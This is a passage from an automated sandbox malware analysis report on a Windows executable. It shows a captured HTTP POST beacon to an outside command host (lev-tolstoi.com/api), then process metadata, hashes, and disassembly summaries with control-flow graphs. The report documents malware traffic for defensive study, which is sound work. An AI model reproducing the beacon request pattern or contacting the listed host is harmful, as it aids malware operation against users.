                                                                                                                                                                                                                                        Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.649718104.21.66.864437352C:\Users\user\Desktop\mgEXk8ip26.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-23 07:54:26 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                        2024-12-23 07:54:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                        2024-12-23 07:54:26 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 07:54:26 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=g2li3ejnt5hhc0p1ms25a61soc; expires=Fri, 18 Apr 2025 01:41:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtDVCjUxVRO0chznQYcdD25XsNOOYhQw5Kb0RWCD1tvLHHuJmJtiX5xX5MSlIGU7BzUQIcKtS7%2FpSOICkndpr1eTag7Tvqt5%2FrcijfEocfooBgj7whfLLztRK7yuqIiOcjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f66c89aad9e5e64-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1534&rtt_var=596&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1804697&cwnd=246&unsent_bytes=0&cid=7a3d8083106c823e&ts=768&x=0"
                                                                                                                                                                                                                                        2024-12-23 07:54:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                        2024-12-23 07:54:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:02:54:17
                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\mgEXk8ip26.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\mgEXk8ip26.exe"
                                                                                                                                                                                                                                        Imagebase:0x9c0000
                                                                                                                                                                                                                                        File size:1'812'480 bytes
                                                                                                                                                                                                                                        MD5 hash:F54DD0914C65108D5F72049DC5490F53
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:0.6%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:26.9%
                                                                                                                                                                                                                                          Total number of Nodes:67
                                                                                                                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                                                                                                                          execution_graph 21173 a18561 21174 a18b19 VirtualAlloc 21173->21174 21176 9ca03d 21177 9ca130 21176->21177 21177->21177 21180 9cacf0 21177->21180 21179 9ca17f 21183 9cad80 21180->21183 21182 9cada5 21182->21179 21183->21182 21184 9fc180 21183->21184 21185 9fc1c0 21184->21185 21186 9fc1ba 21184->21186 21187 9fc1d6 21184->21187 21188 9fc198 21184->21188 21189 9fc1a6 21184->21189 21190 9fc1d0 21184->21190 21185->21183 21196 9faa80 21186->21196 21192 9faaa0 RtlFreeHeap 21187->21192 21188->21185 21188->21187 21188->21189 21188->21190 21195 9fc1ab RtlReAllocateHeap 21189->21195 21199 9faaa0 21190->21199 21194 9fc1df 21192->21194 21195->21185 21203 9fd810 21196->21203 21198 9faa8a RtlAllocateHeap 21198->21185 21200 9faac4 21199->21200 21201 9faab3 21199->21201 21200->21187 21202 9faab8 RtlFreeHeap 21201->21202 21202->21200 21204 9fd830 21203->21204 21204->21198 21204->21204 21210 9ce71b 21211 9ce720 CoUninitialize 21210->21211 21212 9c8850 21214 9c885f 21212->21214 21213 9c8acf ExitProcess 21214->21213 21215 9c8ab8 21214->21215 21220 9cc550 CoInitializeEx 21214->21220 21221 9fc160 FreeLibrary 21215->21221 21221->21213 21222 9f5972 21225 9f599b 21222->21225 21223 9f59c4 21225->21223 21226 9fc1f0 LdrInitializeThunk 21225->21226 21226->21225 21227 9fe7d0 21229 9fe800 21227->21229 21228 9fe94e 21231 9fe87f 21229->21231 21233 9fc1f0 LdrInitializeThunk 21229->21233 21231->21228 21234 9fc1f0 LdrInitializeThunk 21231->21234 21233->21231 21234->21228 21235 9fc58a 21237 9fc460 21235->21237 21236 9fc5f4 21237->21236 21240 9fc1f0 LdrInitializeThunk 21237->21240 21239 9fc54d 21240->21239 21241 9fc867 21243 9fc8a0 21241->21243 21242 9fc9fe 21243->21242 21245 9fc1f0 LdrInitializeThunk 21243->21245 21245->21242 21246 9fc767 21247 9fc790 21246->21247 21247->21247 21248 9fc80e 21247->21248 21250 9fc1f0 LdrInitializeThunk 21247->21250 21250->21248 21251 9fcce6 21252 9fcd00 21251->21252 21252->21252 21253 9fcd6e 21252->21253 21258 9fc1f0 LdrInitializeThunk 21252->21258 21257 9fc1f0 LdrInitializeThunk 21253->21257 21256 9fce4d 21257->21256 21258->21253 21259 a186dc 21260 a1883a VirtualAlloc 21259->21260 21262 a190ea 21260->21262 21263 9cc583 CoInitializeSecurity

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 009CACF0 Relevance: 9.2, Strings: 7, Instructions: 430COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 0 9cacf0-9cad78 1 9cad80-9cad89 0->1 1->1 2 9cad8b-9cad9e 1->2 4 9cadac-9cafc7 2->4 5 9cb09d-9cb0b7 2->5 6 9cb01e-9cb096 call 9c7f00 2->6 7 9cb0ff-9cb10a 2->7 8 9cada5-9cada7 2->8 9 9cb0e7-9cb0f0 2->9 10 9cb0f7-9cb0fd 2->10 11 9cb012-9cb019 2->11 13 9cafd0-9caff2 4->13 18 9cb0be-9cb0e2 call 9fdbf0 5->18 20 9cb359-9cb364 5->20 6->5 6->7 6->9 6->10 14 9cb33c 6->14 15 9cb23c-9cb254 call 9fdbf0 6->15 16 9cb37c 6->16 17 9cb31d 6->17 6->18 19 9cb1d8-9cb1df 6->19 6->20 21 9cb295-9cb2b4 6->21 22 9cb2f5-9cb31b 6->22 23 9cb375 6->23 24 9cb2d6-9cb2df call 9fc180 6->24 25 9cb256-9cb263 6->25 26 9cb330 6->26 27 9cb212-9cb224 6->27 28 9cb332-9cb335 6->28 29 9cb268-9cb289 call 9fdbf0 6->29 30 9cb1eb-9cb20b 6->30 31 9cb22b-9cb235 6->31 32 9cb1c4-9cb1d1 6->32 33 9cb341-9cb34b 6->33 35 9cb110-9cb13a 7->35 12 9cb351-9cb358 8->12 9->7 9->10 9->14 9->15 9->16 9->17 9->18 9->19 9->20 9->21 9->22 9->23 9->24 9->25 9->26 9->27 9->28 9->29 9->30 9->31 9->32 9->33 34 9cb141-9cb164 10->34 36 9cb367-9cb373 11->36 13->13 38 9caff4-9cafff 13->38 14->33 15->25 52 9cb383 16->52 46 9cb322-9cb328 17->46 18->20 19->30 20->36 55 9cb2bd-9cb2cf 21->55 22->46 23->16 56 9cb2e4-9cb2ee 24->56 25->33 27->14 27->15 27->16 27->17 27->18 27->19 27->20 27->21 27->22 27->23 27->24 27->25 27->26 27->28 27->29 27->31 27->33 28->14 28->15 28->16 28->18 28->19 28->20 28->23 28->25 28->29 28->33 29->21 30->14 30->15 30->16 30->17 30->18 30->19 30->20 30->21 30->22 30->23 30->24 30->25 30->26 30->27 30->28 30->29 30->31 30->33 31->15 31->16 31->18 31->19 31->20 31->23 31->25 31->29 32->16 32->18 32->19 32->20 32->23 32->29 33->12 42 9cb170-9cb1a1 34->42 35->35 41 9cb13c-9cb13f 35->41 36->12 59 9cb002-9cb00b 38->59 41->34 42->42 57 9cb1a3-9cb1bd 42->57 46->26 52->52 55->14 55->15 55->16 55->17 55->18 55->19 55->20 55->22 55->23 55->24 55->25 55->26 55->28 55->29 55->33 56->14 56->15 56->16 56->17 56->18 56->19 56->20 56->22 56->23 56->25 56->26 56->28 56->29 56->33 57->14 57->15 57->16 57->17 57->18 57->19 57->20 57->21 57->22 57->23 57->24 57->25 57->26 57->27 57->28 57->29 57->30 57->31 57->32 57->33 59->5 59->6 59->7 59->9 59->10 59->11 59->14 59->15 59->16 59->17 59->18 59->19 59->20 59->21 59->22 59->23 59->24 59->25 59->26 59->27 59->28 59->29 59->30 59->31 59->32 59->33
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                                                                                                                                                                                                                          • API String ID: 0-2986092683
                                                                                                                                                                                                                                          • Opcode ID: 0ac9bba88c0200a6eb4a97e7da61ffe2552a44b060f6d65ba8982e623af97f1b
                                                                                                                                                                                                                                          • Instruction ID: ef4ed0c1c181dfae349754b4726ffc407481c60c64e8e84f15a94fa3a0e1ab64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ac9bba88c0200a6eb4a97e7da61ffe2552a44b060f6d65ba8982e623af97f1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA0286B1601B05CFD324CF65D895BABBBF5FB44304F148A2CE5AA8BAA0D775A406CF41
                                                                                                                                                                                                                                          Function 009C8850 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 90 9c8850-9c8861 call 9fbc60 93 9c8acf-9c8ad7 ExitProcess 90->93 94 9c8867-9c888f call 9c8020 90->94 97 9c8890-9c88cb 94->97 98 9c88cd-9c8902 97->98 99 9c8904-9c8916 call 9f54e0 97->99 98->97 102 9c891c-9c893f 99->102 103 9c8ab8-9c8abf 99->103 111 9c8945-9c8a3b 102->111 112 9c8941-9c8943 102->112 104 9c8aca call 9fc160 103->104 105 9c8ac1-9c8ac7 call 9c8030 103->105 104->93 105->104 115 9c8a3d-9c8a69 111->115 116 9c8a6b-9c8aac call 9c9b00 111->116 112->111 115->116 116->103 119 9c8aae call 9cc550 116->119 121 9c8ab3 call 9cb390 119->121 121->103
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 009C8AD1
                                                                                                                                                                                                                                            • Part of subcall function 009CC550: CoInitializeEx.COMBASE(00000000,00000002), ref: 009CC564
                                                                                                                                                                                                                                            • Part of subcall function 009CB390: FreeLibrary.KERNEL32(009C8AB8), ref: 009CB396
                                                                                                                                                                                                                                            • Part of subcall function 009CB390: FreeLibrary.KERNEL32 ref: 009CB3B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary$ExitInitializeProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3534244204-0
                                                                                                                                                                                                                                          • Opcode ID: 977a628b51f67d84f1cf5569b25bb8755ee12c8fdf53c2ad11d4806a47257510
                                                                                                                                                                                                                                          • Instruction ID: f0d34d3f80b5b71222e9480a9ad179221c314ecf0f633af99be27c02544415e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 977a628b51f67d84f1cf5569b25bb8755ee12c8fdf53c2ad11d4806a47257510
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 425178B7F502180BD71CEAA98C5ABAA758B8BC5710F1F813E5945EF3D6EDB48C0542C2
                                                                                                                                                                                                                                          Function 009FC1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 142 9fc1f0-9fc222 LdrInitializeThunk
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(009FE31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 009FC21E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                          Function 009FC767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ,+*)
                                                                                                                                                                                                                                          • API String ID: 0-3529585375
                                                                                                                                                                                                                                          • Opcode ID: 4e21634b46c90cc9945c5437421136bb726854dd53b7520e51b638b4787cdd45
                                                                                                                                                                                                                                          • Instruction ID: e72be698116794dee392398c13142d34cdba86a7483b51be88fd4d9103566a8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e21634b46c90cc9945c5437421136bb726854dd53b7520e51b638b4787cdd45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3831B675B402199FDB14CF58CD91BBEB7B2BB49300F249528D546A73D5CB75AC028B50
                                                                                                                                                                                                                                          Function 009CB70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: o`
                                                                                                                                                                                                                                          • API String ID: 0-3993896143
                                                                                                                                                                                                                                          • Opcode ID: ff8874cee024238dd2d5acb8d703bc09a099df228efbc7e54246171c3fca8820
                                                                                                                                                                                                                                          • Instruction ID: e46a858c7e1991adb03c34ca16300060a329258573243f8e5a11e055e5503c19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff8874cee024238dd2d5acb8d703bc09a099df228efbc7e54246171c3fca8820
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E611A070619384AFC300CFA5DDC2B6FBFE69BC2304F54983DE18197261C675E94A9715
                                                                                                                                                                                                                                          Function 009C9C4A Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.2259772326.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259749822.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259772326.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259826460.0000000000A12000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000C96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2259848535.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260127867.0000000000CAF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260253949.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.2260272514.0000000000E42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_9c0000_mgEXk8ip26.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0cc49e7f1715e61a672f22ca81c18a8a4f0a321fcba8d2ac59ba8dfd9a5fa74f
